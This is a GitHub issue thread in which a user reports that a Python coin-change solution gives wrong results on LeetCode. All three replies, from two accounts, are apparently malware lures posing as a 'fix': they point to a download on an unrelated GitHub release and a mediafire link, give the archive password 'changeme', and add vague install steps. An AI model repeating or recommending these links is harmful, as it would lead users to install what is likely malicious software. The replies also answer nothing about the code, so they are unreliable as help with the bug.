### ISSUE TITLE
Wrong execution when submit

### ISSUE THREAD

**Issue by AlexWeiZH** [LeetCode-Feedback/LeetCode-Feedback#21110]
### Code used for Submit/Run operation

```
import sys
class Solution:
    fewest = sys.maxsize
    memoize = {}
    def coinChange(self, coins: List[int], amount: int) -> int:
        if amount == 0:
            return 0
        coins.sort()
        self.dp(coins,amount,0)
        return self.fewest if self.fewest != sys.maxsize else -1
    def dp(self, coins: List[int], amount: int, count: int) -> int:
        if amount == 0:
            self.fewest = min(self.fewest, count)
            return count
        elif amount > 0:
            for i in range(len(coins)-1,-1,-1):
                rest = amount - coins[i]
                if not self.memoize.get(str(rest)+str(coins[i])):
                    self.memoize[str(rest)+str(coins[i])] = self.dp(coins, rest, count+1)
                if self.memoize.get(str(rest)+str(coins[i])) != -1:
                    return self.memoize[str(rest)+str(coins[i])]
                if i == 0 and self.memoize[str(rest)+str(coins[i])] == -1:
                    return -1
        else:
            return -1
```

### Screenshots:
![image](https://github.com/LeetCode-Feedback/LeetCode-Feedback/assets/98062338/05eb964d-e282-44a5-a9a1-f76b830d4d38)

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
